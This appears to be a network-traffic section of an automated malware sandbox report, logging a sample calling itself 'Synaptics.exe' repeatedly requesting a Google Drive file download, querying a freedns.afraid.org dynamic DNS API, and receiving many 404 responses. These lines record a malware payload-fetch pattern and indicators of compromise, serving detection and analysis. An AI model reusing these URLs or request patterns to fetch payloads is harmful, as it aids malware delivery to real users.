                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:15 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4bAlBbOaiT_hTXvvmYwNRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:15 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vpJfeg6kjn4Ijj-MdmjgMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:17 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9ATWUqWplyjaZX-8YRpg4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:17 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8wRx_faYmVTA8D5WLtXo5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9R5mwl4rYkZg3c-4B7qtMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4qLAeArRAnTGw8wdmFdaFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nK_zVm8RpduIrJRUkFtKrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SCJceu0jJ5LJ5g8si9tx1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-sCDEfOABCSvIz84aGtWdbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-oje0L9RWaQhTRD4wFQsMjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-7x-dDGPCK1jzWlmJAVXdXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-owSLexwcwI23LgFNuhQtcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-wx2waV2Lj-f-ALhfHunfqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tyf8AIDhJKLFOFMri0-Uwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
